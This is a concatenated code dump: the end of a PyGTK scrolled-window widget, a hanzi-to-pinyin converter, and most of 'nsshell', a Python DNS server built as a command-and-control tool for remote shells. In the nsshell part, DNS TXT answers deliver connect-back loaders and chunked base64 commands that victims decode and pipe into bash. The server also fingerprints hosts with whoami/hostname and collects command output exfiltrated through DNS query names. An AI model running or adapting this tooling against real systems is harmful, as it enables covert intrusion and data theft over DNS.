self.vwindow.shape_combine_region(region, -self.right_space, self.top_bootm_space)
else:
self.vwindow.shape_combine_region(region, -self.right_space, -self.top_bootm_space)
else:
raise "make_bar_bigger's orientation must be gtk.ORIENTATION_VERTICAL or gtk.ORIENTATION_HORIZONTAL"
def do_scroll_event(self, e):
value = self.vadjustment.value
step = self.vadjustment.step_increment
page_size = self.vadjustment.page_size
upper = self.vadjustment.upper
#TODO: need handle other scrolltype? I can only capture below two scrolltype at the moment
if e.direction == gdk.SCROLL_DOWN:
self.vadjustment.set_value(min(upper-page_size-1, value+step))
return True
elif e.direction == gdk.SCROLL_UP:
self.vadjustment.set_value(max(0, value-step))
return True
else:
return False
def do_leave_notify_event(self, e):
if e.window == self.hwindow :
self._horizaontal.is_inside = False
#if e.y < 0 and not self._horizaontal.in_motion:
if not self._horizaontal.in_motion:
self.make_bar_smaller(gtk.ORIENTATION_HORIZONTAL)
return True
elif e.window == self.vwindow:
self._vertical.is_inside = False
if not self._vertical.in_motion:
#if e.x < 0 and not self._vertical.in_motion:
self.make_bar_smaller(gtk.ORIENTATION_VERTICAL)
return True
else:
return False
def do_enter_notify_event(self, e):
if e.window == self.hwindow:
self.make_bar_bigger(gtk.ORIENTATION_HORIZONTAL)
self._horizaontal.is_inside = True
return True
elif e.window == self.vwindow:
self.make_bar_bigger(gtk.ORIENTATION_VERTICAL)
self._vertical.is_inside = True
return True
else:
return False
def do_motion_notify_event(self, e):
if not (e.window == self.hwindow or e.window == self.vwindow): return False
if e.window == self.hwindow and (e.state & gtk.gdk.BUTTON1_MASK) == gtk.gdk.BUTTON1_MASK:
self.make_bar_bigger(gtk.ORIENTATION_HORIZONTAL)
if self._horizaontal.last_time == 0:
self._horizaontal.last_time = e.time
elif e.time - self._horizaontal.last_time > 1000:
self._horizaontal.last_time = 0
self._horizaontal.last_pos = 0
if self._horizaontal.last_pos == 0 or self._horizaontal.last_time == 0:
self._horizaontal.last_pos = e.x_root
return True
deltaX = e.x_root - self._horizaontal.last_pos
upper = self.hadjustment.upper
#the pos maybe beyond the effective range, but we will immediately corrected
#it's value.
#the "invariant" is the "value" always in the effective range.
value = pos2value(self._horizaontal.bar_pos+deltaX, self._horizaontal.virtual_len, upper)
value = max(0, min(value, self.hadjustment.upper-self.hadjustment.page_size))
self.hadjustment.set_value(value)
self._horizaontal.last_pos = e.x_root
self._horizaontal.last_time = e.time
self._horizaontal.in_motion = True
return True
elif e.window == self.vwindow and (e.state & gtk.gdk.BUTTON1_MASK) == gtk.gdk.BUTTON1_MASK:
self.make_bar_bigger(gtk.ORIENTATION_VERTICAL)
if self._vertical.last_time == 0:
self._vertical.last_time = e.time
elif e.time - self._vertical.last_time > 1000:
self._vertical.last_time = 0
self._vertical.last_pos = 0
if self._vertical.last_pos == 0 or self._vertical.last_time == 0:
self._vertical.last_pos = e.y_root
return True
upper = self.vadjustment.upper
deltaY = e.y_root - self._vertical.last_pos
value = pos2value(self._vertical.bar_pos+deltaY, self._vertical.virtual_len, upper)
value = max(0, min(value, self.vadjustment.upper-self.vadjustment.page_size))
self.vadjustment.set_value(value)
self._vertical.last_pos = e.y_root
self._vertical.last_time = e.time
self._vertical.in_motion = True
return True
def calc_vbar_length(self):
self._vertical.virtual_len = self.allocation.height
if self.vadjustment.upper <= 1 or self._vertical.policy == gtk.POLICY_NEVER:
self._vertical.bar_len = 0
return
ratio = float(self.vadjustment.page_size) / (self.vadjustment.upper-self.vadjustment.lower)
# assert(self.vadjustment.upper >= self.vadjustment.page_size)
if ratio == 1:
self._vertical.bar_len = 0
else:
bar_len = self._vertical.virtual_len * ratio
if bar_len < self.bar_min_length:
self._vertical.virtual_len -= (self.bar_min_length - bar_len)
self._vertical.bar_len = max(bar_len, self.bar_min_length)
def calc_vbar_allocation(self):
self.vallocation = gdk.Rectangle(
self.allocation.width - self.bar_width, int(self._vertical.bar_pos),
self.bar_width, int(self._vertical.bar_len))
def calc_hbar_length(self):
self._horizaontal.virtual_len = self.allocation.width
if self.hadjustment.upper <= 1 or self._horizaontal.policy == gtk.POLICY_NEVER:
self._horizaontal.bar_len = 0
return
ratio = float(self.hadjustment.page_size) / (self.hadjustment.upper-self.hadjustment.lower)
# assert(self.hadjustment.lower == 0)
# assert(self.hadjustment.upper >= self.hadjustment.page_size)
if ratio == 1:
self._horizaontal.bar_len = 0
else:
bar_len = self._horizaontal.virtual_len * ratio
if bar_len < self.bar_min_length:
self._horizaontal.virtual_len -= (self.bar_min_length - bar_len)
self._horizaontal.bar_len = max(bar_len, self.bar_min_length)
def calc_hbar_allocation(self):
#assert 0 <= int(self.hpos) <= self.allocation.width - self.hbar_length,\
# "self.hpos %f self.allocation.width %f self.hbar_lengh %f" % (self.hpos, self.allocation.width,
# self.hbar_length)
self.hallocation = gdk.Rectangle(
int(self._horizaontal.bar_pos), self.allocation.height - self.bar_width,
int(self._horizaontal.bar_len), self.bar_width)
def vadjustment_changed(self, adj):
if self.get_realized():
# assert(self.vadjustment.value <= self.vadjustment.upper-self.vadjustment.page_size)
upper = self.vadjustment.upper
self._vertical.bar_pos = value2pos(adj.value, self._vertical.virtual_len, upper)
self.calc_vbar_allocation()
self.vwindow.move_resize(*self.vallocation)
self.queue_draw()
def hadjustment_changed(self, adj):
if self.get_realized():
# assert(self.hadjustment.value <= self.hadjustment.upper-self.hadjustment.page_size)
upper = self.hadjustment.upper
self._horizaontal.bar_pos = value2pos(adj.value, self._horizaontal.virtual_len, upper)
self.calc_hbar_allocation()
self.hwindow.move_resize(*self.hallocation)
self.queue_draw()
def add_with_viewport(self, child):
vp = gtk.Viewport()
vp.set_shadow_type(gtk.SHADOW_NONE)
vp.add(child)
vp.show()
self.add(vp)
def add_child(self, child):
self.add_with_viewport(child)
#raise Exception, "use add_with_viewport instead add_child"
def do_add(self, child):
self.child = None
gtk.Bin.do_add(self, child)
child.set_scroll_adjustments(self.hadjustment, self.vadjustment)
def do_size_request(self, requsition):
if self.child:
#print "sel size_request", (requsition.width, requsition.height)
self.child.do_size_request(self.child, requsition)
#print "child size request:", (requsition.width, requsition.height)
def do_size_allocate(self, allocation):
#print "do_size_allocate", allocation
self.allocation = allocation
if self.get_realized():
self.binwindow.move_resize(*self.allocation)
#must before calc_xxx_length, because we need child to cumpute the adjustment value
if self.child:
(allocation.x, allocation.y) = (0, 0)
self.child.do_size_allocate(self.child, allocation)
self.update_scrollbar()
if self.get_realized():
self.make_bar_smaller(gtk.ORIENTATION_VERTICAL)
self.make_bar_smaller(gtk.ORIENTATION_HORIZONTAL)
def update_scrollbar(self, *arg, **argk):
if self.get_realized():
self.calc_vbar_length()
self.calc_hbar_length()
self.vadjustment.emit('value-changed')
self.hadjustment.emit('value-changed')
def do_unrealize(self):
#print "do_unrealize"
self.binwindow.set_user_data(None)
self.binwindow.destroy()
self.binwindow = None
self.vwindow.set_user_data(None)
self.vwindow.destroy()
self.vwindow = None
self.hwindow.set_user_data(None)
self.hwindow.destroy()
self.hwindow = None
# assert(self.get_realized() == True)
gtk.Bin.do_unrealize(self)
# assert(self.get_realized() == False)
def do_realize(self):
#print "self.get_parent_window():", self.get_parent_window()
#print "do_realize", self.get_realized()
# assert(self.get_realized() == False)
gtk.Bin.do_realize(self)
# assert(self.get_realized() == True)
self.binwindow = gtk.gdk.Window(self.get_parent_window(),
x=self.allocation.x,
y=self.allocation.y,
width=self.allocation.width,
height=self.allocation.height,
window_type=gtk.gdk.WINDOW_CHILD,
wclass=gtk.gdk.INPUT_OUTPUT,
event_mask=(self.get_events()| gdk.EXPOSURE_MASK | gdk.VISIBILITY_NOTIFY_MASK),
visual=self.get_visual(),
colormap=self.get_colormap(),
)
self.binwindow.set_user_data(self)
self.vwindow = gtk.gdk.Window(self.binwindow,
x=self.vallocation.x,
y=self.vallocation.y,
width=self.vallocation.width,
height=self.vallocation.height,
window_type=gtk.gdk.WINDOW_CHILD,
wclass=gtk.gdk.INPUT_OUTPUT,
visual=self.get_visual(),
colormap=self.get_colormap(),
event_mask=(self.get_events()
| gdk.EXPOSURE_MASK
| gdk.ENTER_NOTIFY_MASK | gdk.LEAVE_NOTIFY_MASK | gdk.BUTTON_RELEASE_MASK
| gdk.BUTTON_MOTION_MASK
| gdk.POINTER_MOTION_HINT_MASK | gdk.BUTTON_PRESS_MASK
)
)
self.vwindow.set_user_data(self)
#sefl.vwindow.get_
#self.vwindow.set_background(self.bar_background)
self.hwindow = gtk.gdk.Window(self.binwindow,
x=self.hallocation.x,
y=self.hallocation.y,
width=self.hallocation.width,
height=self.hallocation.height,
window_type=gtk.gdk.WINDOW_CHILD,
wclass=gtk.gdk.INPUT_OUTPUT,
colormap=self.get_colormap(),
visual=self.get_visual(),
event_mask=(self.get_events()
| gdk.EXPOSURE_MASK
| gdk.ENTER_NOTIFY_MASK | gdk.LEAVE_NOTIFY_MASK | gdk.BUTTON_RELEASE_MASK
| gdk.BUTTON_MOTION_MASK
| gdk.POINTER_MOTION_HINT_MASK | gdk.BUTTON_PRESS_MASK
)
)
self.hwindow.set_user_data(self)
#self.hwindow.set_background(self.bar_background)
if self.child:
self.child.set_parent_window(self.binwindow)
self.queue_resize()
def set_shadow_type(self, t):
#raise Warning("dtk's scrolledwindow didn't support this function")
return
def set_policy(self, h, v):
self._horizaontal.policy = h
self._vertical.policy = v
return
def do_map(self):
gtk.Bin.do_map(self) #must before self.xwindow.show(), didn't know the reason.
self.binwindow.show()
self.hwindow.show()
self.vwindow.show()
if self.child and not self.child.get_mapped() and self.child.get_visible():
self.child.do_map(self.child)
def do_unmap(self):
#self.set_mapped(False)
self.binwindow.hide()
self.hwindow.hide()
self.vwindow.hide()
gtk.Bin.do_unmap(self)
def do_remove(self, child):
child.set_scroll_adjustments(None, None)
gtk.Bin.do_remove(self, child)
def get_vadjustment(self):
return self.vadjustment
def get_hadjustment(self):
return self.hadjustment
def set_hadjustment(self, adj):
remove_signal_id(self.h_value_change_id)
remove_signal_id(self.h_change_id)
self.hadjustment = adj
h_value_change_handler_id = self.hadjustment.connect('value-changed', self.hadjustment_changed)
h_change_handler_id = self.hadjustment.connect('changed', self.update_scrollbar)
self.h_value_change_id = (self.hadjustment, h_value_change_handler_id)
self.h_change_id = (self.hadjustment, h_change_handler_id)
def set_vadjustment(self, adj):
remove_signal_id(self.v_value_change_id)
remove_signal_id(self.v_change_id)
self.vadjustment = adj
v_value_change_handler_id = self.vadjustment.connect('value-changed', self.vadjustment_changed)
v_change_handler_id = self.vadjustment.connect('changed', self.update_scrollbar)
self.v_value_change_id = (self.vadjustment, v_value_change_handler_id)
self.v_change_id = (self.vadjustment, v_change_handler_id)
def _test_calc(self):
for i in xrange(0, int(self.vadjustment.upper-self.vadjustment.page_size), 30):
pos = value2pos(i, self._vertical.virtual_len, self.vadjustment.upper)
print "value:%f --> pos:%d" % (i, pos),
assert(pos <= self.allocation.height-self._vertical.bar_len),\
"pos(%f) should small than(%f)" % (pos, self.allocation.height-self._vertical.bar_len)
value = pos2value(pos, self._vertical.virtual_len, self.vadjustment.upper)
print "\t pos:%d -->value:%f" % (pos, value)
print "v_len:%f, height:%f, vir_bar_len:%d" % ( self._vertical.virtual_len,
self.allocation.height, self._vertical.bar_len)
gobject.type_register(ScrolledWindow)
| gpl-3.0 | -7,670,683,437,124,144,000 | 40.596958 | 137 | 0.603016 | false |
golden-tech-native/gd_facerecognize | server/common/hanzi_to_pinyin/pinyin.py | 1 | 2488 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
原版代码:https://github.com/cleverdeng/pinyin.py
新增功能:
1、可以传入参数firstcode:如果为true,只取汉子的第一个拼音字母;如果为false,则会输出全部拼音;
2、修复:如果为英文字母,则直接输出;
3、修复:如果分隔符为空字符串,仍然能正常输出;
4、升级:可以指定词典的文件路径
"""
__version__ = '0.9'
__all__ = ["PinYin"]
import os.path
class PinYin(object):
def __init__(self):
self.word_dict = {}
def load_word(self, dict_file):
self.dict_file = dict_file
if not os.path.exists(self.dict_file):
raise IOError("NotFoundFile")
with file(self.dict_file) as f_obj:
for f_line in f_obj.readlines():
try:
line = f_line.split(' ')
self.word_dict[line[0]] = line[1]
except:
line = f_line.split(' ')
self.word_dict[line[0]] = line[1]
def hanzi2pinyin(self, string="", firstcode=False):
result = []
if not isinstance(string, unicode):
string = string.decode("utf-8")
for char in string:
key = '%X' % ord(char)
value = self.word_dict.get(key, char)
outpinyin = str(value).split()[0][:-1].lower()
if not outpinyin:
outpinyin = char
if firstcode:
result.append(outpinyin[0])
else:
result.append(outpinyin)
return result
def hanzi2pinyin_split(self, string="", split="", firstcode=False):
"""提取中文的拼音
@param string:要提取的中文
@param split:分隔符
@param firstcode: 提取的是全拼还是首字母?如果为true表示提取首字母,默认为False提取全拼
"""
result = self.hanzi2pinyin(string=string, firstcode=firstcode)
return split.join(result)
if __name__ == "__main__":
test = PinYin()
test.load_word('word.data')
string = "Java程序性能优化-让你的Java程序更快更稳定"
print "in: %s" % string
print "out: %s" % str(test.hanzi2pinyin(string=string))
print "out: %s" % test.hanzi2pinyin_split(string=string, split="", firstcode=True)
print "out: %s" % test.hanzi2pinyin_split(string=string, split="", firstcode=False)
| mit | -7,410,435,475,929,635,000 | 27.746667 | 87 | 0.551948 | false |
TheRook/nsshell | nsshell/__init__.py | 1 | 31810 | #!/usr/bin/env python
#rook
from __future__ import print_function
import base64
import itertools
import random
import Queue
import string
import sys
import subprocess
import re
import os
import datetime
from argparse import ArgumentParser, RawTextHelpFormatter
from twisted.internet import defer, stdio
from twisted.names import dns, server
from twisted.protocols import basic
from twisted.internet import reactor
from requests import get as rget
try:
#Load from the 'trusted' path that we load everything else from.
from nsshell.loader import loader
from nsshell.config import config
except ImportError:
#This should rarely happen
#The cwd could contain malicious python libraries which would be executed as root.
sys.path.append('.')
from nsshell.loader import loader
from nsshell.config import config
#The DNS server
#This class is intentionally limited 'client.Resolver' - we don't want an open relay
class ShellResolver:
def __init__(self, session, ip, hostname, loader):
self.ip = ip
self.session = session
self.hostname = hostname
self.loader = loader
self.chunk_keys = map(''.join, itertools.product(string.ascii_letters, repeat=2))
def lookupAllRecords(self, name="", timeout=0):
pass
def query(self, query, timeout=None):
answers = []
additional = []
authority = []
chunk_cmd = ""
direct = None
#8.8.8.8 returns at most 14 txt records per query.
page_size = 14
shell_type = "bash"
query_name = query.name.name
#query_type = dns.QUERY_TYPES[query.type]
triggered_payload = False
cmd_runner = False
#This is an alternate injection
#Some sh connectbacks may need this padding.
if query_name.startswith("{echo,'"):
query_name=query_name[7:]
shell_type = "sh"
#strip of the hostname for this message
if query_name.endswith(self.hostname):
name_parts = query_name[0:len(query_name)-len(self.hostname)].split(".")
#A direct connection must end with our hostname
direct = False
else:
#This is direct because it could not have used an open resolver
name_parts = query_name.strip(".").split('.')
direct = True
#have we seen this session before?
sess_id = self.session.get_session(name_parts[0])
#Clients need to resolve the address of this server - here is our root
if query.type == dns.A:
#Resolve this server's A record.
cmd_server = dns.RRHeader(
name=query.name.name,
type=dns.A,
auth=True,
payload=dns.Record_A(address=self.ip, ttl=0))
answers.append(cmd_server)
if not sess_id:
log("", "", "query", str(datetime.datetime.now())+","+query.name.name+"\n")
elif query.type == dns.NS:
#Resolve this server's NS record
cmd_server = dns.RRHeader(
name=query.name.name,
type=dns.NS,
auth=True,
payload=dns.Record_NS(self.hostname, ttl=0))
answers.append(cmd_server)
#for debugging open resolvers
#size.x to find the max number of txt records returned.
elif query.type == dns.TXT and query.name.name.startswith("size"):
try:
txt_count = int(query.name.name.split(".")[-1])
except:
txt_count = 1
#Resolve this server's NS record
cmd_server = dns.RRHeader(
name=query.name.name,
type=dns.TXT,
auth=True,
payload=dns.Record_TXT("a" * 255, ttl=0))
for i in range(txt_count):
answers.append(cmd_server)
#We are only checking the size.
return defer.succeed((answers, authority, additional))
if not sess_id:
if len(name_parts) > 0:
if name_parts[0] in self.session.keyspace:
#We don't have this session, and it looks like the key will work as a session id.
sess_id = self.session.new(name_parts[0])
else:
sess_id = self.session.new()
#Did a known payload trigger this request?
triggered_payload = self.loader.get_payload(name_parts[0])
if triggered_payload:
self.session.set_data(sess_id, "payload", triggered_payload)
trigger_lower = triggered_payload.lower()
if trigger_lower.find("bash") >= 0:
shell_type = "bash"
elif trigger_lower.find("sh") >= 0:
shell_type = "sh"
elif trigger_lower.find("perl") >= 0:
shell_type = "perl"
elif trigger_lower.find("cmd") >= 0:
shell_type = "cmd"
elif trigger_lower.find("powershell") >= 0:
shell_type = "ps1"
else:
self.session.set_data(sess_id, "payload", query.name.name)
self.session.set_data(sess_id, "direct", direct)
#Direct connections do not have a protocol level limit of the number of results.
#This cap depends on the implementation of nslookup.
self.session.set_data(sess_id, "shell_type", shell_type)
else:
#Is this a direct connection?
direct = self.session.get_data(sess_id, "direct")
shell_type = self.session.get_data(sess_id, "shell_type")
page_size = self.session.get_data(sess_id, "page_size")
#These messages conditions need to be checked in all phases of the session
if self.session.check_exit(sess_id):
#send exit code
cmd_runner = "e=1"
elif not self.session.get_data(sess_id, "host") and direct == None:
#lets try a direct payload
direct_sess_id = self.session.new()
self.loader.get_connect(direct_sess_id, True, shell_type)
self.session.set_data(direct_sess_id, "direct", True)
self.session.set_data(direct_sess_id, "shell_type", shell_type)
self.session.set_data(sess_id, "direct", False)
cmd_runner = self.loader.get_connect(direct_sess_id, True, shell_type)
elif not self.session.get_data(sess_id, "host"):
#Reqeust the machine_id for this new session.
cmd = "eval 'whoami;hostname'"
cmd_runner = self.loader.get_runner(sess_id, cmd, direct, shell_type)
if not self.session.get_data(sess_id, "host"):
#If we haven't seen this session before, then we need some kind of identificaiton.
if len(name_parts) > 1:
data = query_name
data = "".join(name_parts[1:])
try:
#Look for a single-block message that contains two newline-seperated elements
machine_id = base64.b64decode(data).strip()
machine_id = machine_id.split("\n")
except:
machine_id = False
if machine_id and len(machine_id) == 2:
new_host = machine_id[1]
new_user = machine_id[0]
if self.session.new_machine(sess_id, new_user, new_host):
message = "new Session: " + sess_id + " - " + new_user + "@"+ new_host +" - payload: " + self.session.get_data(sess_id, "payload")
print("\n"+message)
log(sess_id, new_host, new_user, message+"\n")
else:
print("\nkilled duplicate: " + sess_id + " - payload: " + self.session.get_data(sess_id, "payload") + " - restart nsshell if this was a mistake.")
#we have tried to exit this host but it reconnected.
self.session.send_exit(sess_id)
name_parts = []
else:
#Send commands
if query.type == dns.TXT:
chunk_cmd = self.session.get_data(sess_id, "chunk_cmd")
if not chunk_cmd:
cmd = self.session.get_motd(sess_id)
else:
cmd = False
if self.session.get_data(sess_id, "last_read") != 0 and self.session.clear_read(sess_id):
#end of read for a command.
self.session.indicator(sess_id)
self.session.set_data(sess_id, "currently_receiving", False)
if cmd and (cmd.lstrip().startswith("cd ") or cmd.lstrip().startswith("eval ") or cmd.lstrip().startswith("export ")):
#This command _is_ a true eval
if cmd.lstrip().startswith("eval "):
cmd = cmd[5:]
#pipes spawn a sub-shell which breaks cd, and 'cd' doesn't return anything anyway.
#eval the raw command
cmd_runner = cmd
self.session.indicator(sess_id)
elif cmd:
cmd_runner = self.loader.get_runner(sess_id, cmd, direct, shell_type)
if len(cmd_runner) > 255:
chunk_cmd = base64.b64encode(cmd)
self.session.set_data(sess_id, "chunk_cmd", chunk_cmd)
self.session.set_data(sess_id, "chunk_offset", 0)
cmd_runner = ""
self.send_chunks(sess_id, answers, query.name.name, direct, shell_type, page_size)
#Did we get data back from the client?
elif len(name_parts) > 1 and len(name_parts[1]) > 2 and name_parts[0][2:].isdigit():
sequence_number = int(name_parts[0][2:])
data = "".join(name_parts[1:])
self.session.add_buffer(sess_id, sequence_number, data)
#Only print stdout if the user is watching.
if self.session.current_session == sess_id:
std_data = self.session.read_stdout(sess_id)
sys.stdout.write(std_data)
if chunk_cmd:
#We still have data, send more pages
self.send_chunks(sess_id, answers, query.name.name, direct, shell_type, page_size)
elif cmd_runner:
if len(cmd_runner) >= 255:
#Should never happen unless there is a bug with the runner
print("cmd runner too large:"+str(len(cmd_runner))+">255")
return
#We have a new command
send_commanad = dns.RRHeader(
name=query.name.name,
type=dns.TXT,
payload=dns.Record_TXT(cmd_runner,ttl=0))
answers.append(send_commanad)
elif not self.session.get_data(sess_id, "host"):
full_connect = self.loader.get_connect(sess_id, direct, shell_type)
if len(full_connect) > 255:
print('{0} connect payload too large.'.format(len(full_connect)))
else:
if len(full_connect) > 255:
#should never happen unless there is a bug with the connect back
print("connectback too large:"+str(len(full_connect))+">255")
return
#send packaged command to the client
connect_back_loader=dns.RRHeader(
name=query.name.name,
type=dns.TXT,
payload=dns.Record_TXT(full_connect))
#"{echo,'"
answers.append(connect_back_loader)
sys.stdout.flush()
return defer.succeed((answers, authority, additional))
#chunk a command, and execute it.
def send_chunks(self, sess_id, answers, query_name, direct, shell_type, page_size):
chunk_runner = ""
cut_len = 0
#4 chars of overhead aa=%data%;
bytes_per_chunk = 255 - 4
chunk_offset = self.session.get_data(sess_id, "chunk_offset")
chunk_cmd = self.session.get_data(sess_id, "chunk_cmd")
chunk_state = self.session.get_data(sess_id, "chunk_state")
cut = chunk_offset * bytes_per_chunk
if chunk_state == "+":
#All chunks sent, execute them.
#self.session.set_data(sess_id, "chunk_offset", 0)
#have we loaded all pages, now run them
full = ""
#Did we process the first page?
if chunk_offset <= 82:
#If this is the first page, then zero out the run key.
chunk_runner = "Z=;"
#List all variables we used
keys_used = chunk_offset % 82
for i in range(keys_used):
full += "$"+self.chunk_keys[i]
chunk_runner = chunk_runner + "Z=$Z" + full + ";"
if cut >= len(chunk_cmd):
chunk_state = "-"
else:
chunk_state = ""
#we have crunched down all vars, now execute the full payload
elif chunk_state == "-":
run_key = "$Z"
chunk_runner = self.loader.get_runner(sess_id, "echo "+run_key+"|base64 --decode|"+shell_type, direct, shell_type)
#all done, good job boys.
chunk_cmd = ""
chunk_state = ""
chunk_offset = 0
else:# we have data
while cut < len(chunk_cmd) and len(answers) <= page_size:
#We can only merge 82 variables with a 255 byte record.
#Todo improve merging by senidng more data, and then merging all blocks down in one phase.
if chunk_offset > 0 and chunk_offset % 82 == 0:
chunk_offset -= 1
chunk_state = "+"
break
key = self.chunk_keys[chunk_offset]
chunk_offset += 1
#build a 255 byte chunk
cut_len = cut + bytes_per_chunk
new_chunk = key+"="+chunk_cmd[cut:cut_len]+";"
cut = cut_len
send_chunk = dns.RRHeader(
name=query_name,
type=dns.TXT,
payload=dns.Record_TXT(new_chunk, ttl=0))
answers.append(send_chunk)
#Check if we still have to send data
if cut >= len(chunk_cmd):
#All set, run the command.
chunk_state = "+"
if chunk_runner:
run_chunk = dns.RRHeader(
name=query_name,
type=dns.TXT,
payload=dns.Record_TXT(chunk_runner, ttl=0))
answers.append(run_chunk)
self.session.set_data(sess_id, "chunk_state", chunk_state)
self.session.set_data(sess_id, "chunk_offset", chunk_offset)
self.session.set_data(sess_id, "chunk_cmd", chunk_cmd)
#The data
class session_handler:
session_index = 0
current_session = False
#q is a a session created for testing, and hardcoded in the test files.
sessions = {}
def __init__(self, payload_count):
self.keyspace = map(''.join, itertools.product(string.ascii_letters + string.digits, repeat=2))
#Payloads will use numbers 0..paylod_count and sessions will be everything other 2 char permutation.
for x in range(10, payload_count):
self.keyspace.remove(str(x))
random.shuffle(self.keyspace)
def set_motd(self, sess_id, message):
self.sessions[sess_id]["stdin"].put(message)
def get_motd(self, sess_id):
ret = False
try:
ret = self.sessions[sess_id]["stdin"].get_nowait()
except:
pass
return ret
#give us a random unique id for a large number of hosts.
def generate_id(self):
id = self.keyspace[self.session_index]
self.session_index += 1
return id
def new(self, new_id = False):
while not new_id:
#we could have used this id by a resumed session
new_id = self.generate_id()
if new_id in self.sessions:
new_id = False
self.sessions[new_id] = {"user": "",
"host": "",
#"ip": "",# not sure how to get this....
"direct": None,
"last_req": datetime.datetime.now(),
"stdin": Queue.Queue(),
"stdout": Queue.Queue(),
"bufferd_read": {},
"last_read": 0,
"leftovers": "",
"shell_type":"bash",
"payload":"",
"currently_receiving":False,
"chunk_cmd":"",
"chunk_offset":0,
"chunk_state":"",
"page_size":14,#8.8.8.8 returns at most 14 txt records per query.
"exit": False
}
return new_id
def list_sessions(self):
return self.sessions.keys()
def check_timeout(self):
delete = []
for sess_id in self.sessions:
#have we gotten a request in the last min?
#Our shell went away :(
#Where did it go?
#Man, I need that fucking shell
#I know, know, its just gone... but it could still come back
if self.sessions[sess_id]['last_req'] <= (datetime.datetime.now() - datetime.timedelta(minutes=1)):
user = self.sessions[sess_id]["user"]
if not self.sessions[sess_id]["exit"] and user:
print("client timed out: " + sess_id + " - " + self.sessions[sess_id]["user"] + '@' \
+ self.sessions[sess_id]["host"])
delete.append(sess_id)
for sess_d in delete:
del self.sessions[sess_d]
def get_data(self, sess_id, key):
return self.sessions[sess_id][key]
def set_data(self, sess_id, key, val):
self.sessions[sess_id][key] = val
def get_session(self, chunk):
ret=False
if isinstance(chunk, list) and len(chunk) > 1:
chunk = chunk[0]
if len(chunk) > 1 and chunk[0]:
#first two char only.
chunk = chunk[0:2]
ret = False
for s in self.sessions:
if chunk == s:
ret = s
#Update the access time on this session.
self.sessions[ret]['last_req'] = datetime.datetime.now()
break
return ret
def put(self, sess_id, b64):
self.sessions[sess_id].append(b64)
def new_machine(self, sess_id, user, host):
ret = True
for sess in self.sessions:
if self.sessions[sess]["user"] == user and self.sessions[sess]["host"] == host and self.check_exit(sess):
#we must have popped this guy twice.
ret = False
break
#should we limit to just one session?
#right now we spawn a new session - more shells is better than not enough shells
self.set_data(sess_id, "user", user)
self.set_data(sess_id, "host", host)
return ret
def send_exit(self, sess_id):
if sess_id in self.sessions:
self.sessions[sess_id]["exit"] = True
#Should this session exit?
def check_exit(self, sess_id):
return sess_id in self.sessions and self.sessions[sess_id]["exit"]
#Check to see if we have all of the data from the client.
def clear_read(self, sess_id):
for i in range(0, self.sessions[sess_id]['last_read'] + 10):
if i in self.sessions[sess_id]["bufferd_read"]:
return False
self.sessions[sess_id]['last_read'] = 0
return True
def add_buffer(self, sess_id, sequence, data):
if self.sessions[sess_id]['exit']:
return
client_data = ""
if sequence == 0 and self.clear_read(sess_id):
self.sessions[sess_id]["currently_receiving"] = True
self.sessions[sess_id]["bufferd_read"][sequence] = data
i = self.sessions[sess_id]["last_read"]
while True:
if i in self.sessions[sess_id]["bufferd_read"]:
client_data += self.sessions[sess_id]["bufferd_read"][i]
del self.sessions[sess_id]["bufferd_read"][sequence]
i += 1
self.sessions[sess_id]["last_read"] = i
else:
break
#Do we have data?
if len(client_data):
client_data = self.sessions[sess_id]["leftovers"] + client_data
try:
#we need some multiple of 4 bytes in order for b64decode to work
valid_count = len(client_data)/4*4
decode_total = client_data[0:valid_count]
decode_total = base64.b64decode(decode_total)
#Somewhere between 0-3 bytes will remain
self.sessions[sess_id]["leftovers"] = client_data[valid_count:]
#we only want to print the current session
self.sessions[sess_id]['stdout'].put(decode_total)
log(sess_id, self.sessions[sess_id]["host"], self.sessions[sess_id]["user"], decode_total)
except:
#this should never happen
print("partial base64 decode error:")
print(len(decode_total))
print(decode_total)
#only print output from the current session
def read_stdout(self, sess_id):
ret = ''
try:
#break on empty
while True:
data = self.sessions[sess_id]['stdout'].get_nowait()
ret += data
except Queue.Empty:
pass
return ret
#print shell information to the user.
def indicator(self, sess_id):
if sess_id:
sys.stdout.write(sess_id + '-' + self.sessions[sess_id]["user"] + '@' + self.sessions[sess_id]["host"] + '>')
else:
sys.stdout.write('>')
class noResponseServer:
def gotResolverResponse(self, *args):
pass
#The UI
class Console(basic.LineReceiver):
from os import linesep as delimiter
current_session = None
current_name = ""
current_host = ""
def setSession(self, session):
self.session = session
def indicator(self):
if self.current_session:
self.transport.write(self.current_session+'-'+self.current_name+'@'+self.current_host+'>')
else:
self.transport.write('>')
def connectionMade(self):
print("ready")
self.indicator()
def lineReceived(self, line):
line = str(line).strip()
line_cmd = line.lower()
#Check for timeouts
self.session.check_timeout()
#the current shell may have timed out, sorry m8
if self.current_session and self.current_session not in self.session.sessions:
print(self.current_session + " went away :(")
self.current_session = False
# Ignore blank lines
if line:
lime_cmd_parts=line.split(" ")
if line_cmd.startswith("quit") or line_cmd.startswith("exit") or line_cmd.startswith("close"):
if len(lime_cmd_parts) < 2:
print("to remove: exit sess_id")
print("to exit the server: ctrl+c (clients will still be running)")
else:
self.do_exit(lime_cmd_parts[1])
self.indicator()
elif line_cmd == "clear":
self.do_clear()
self.indicator()
elif line_cmd == "help" or line_cmd == "?" or line_cmd == "'help'":
self.do_help()
self.indicator()
elif line_cmd.startswith("session") or line_cmd.startswith("open") or line_cmd.startswith("connect"):
if len(lime_cmd_parts) < 2:
self.do_sessions()
else:
#forgiving - will accept metasploit syntax
if lime_cmd_parts[1] == "-i":
lime_cmd_parts[1] = lime_cmd_parts[2]
self.change_session(lime_cmd_parts[1])
self.indicator()
elif self.current_session:
log(self.current_session, self.current_host, self.current_name, str(datetime.datetime.now())+">"+line+"\n")
self.session.set_motd(self.current_session, line)
else:
print("type 'help' to get a list of commands")
self.indicator()
sys.stdout.flush()
def do_help(self, command=None):
"""help [command]: List commands, or show help on the given command"""
if command:
self.sendLine(getattr(self, 'do_' + command).__doc__)
else:
commands = [cmd[3:] for cmd in dir(self) if cmd.startswith('do_')]
self.sendLine("valid commands: " + " ".join(commands))
def change_session(self, sess_id):
my_id = self.session.get_session(sess_id)
if my_id:
self.current_session = my_id
self.current_name = self.session.get_data(self.current_session, "user")
self.current_host = self.session.get_data(self.current_session, "host")
self.session.current_session = my_id
std_data = self.session.read_stdout(my_id)
sys.stdout.write(std_data)
print("changed to active session:"+sess_id)
else:
print("not an active session:"+sess_id)
def do_sessions(self):
printed = False
"""sessions: Interact with connected systems."""
for sess_id in self.session.list_sessions():
printed=True
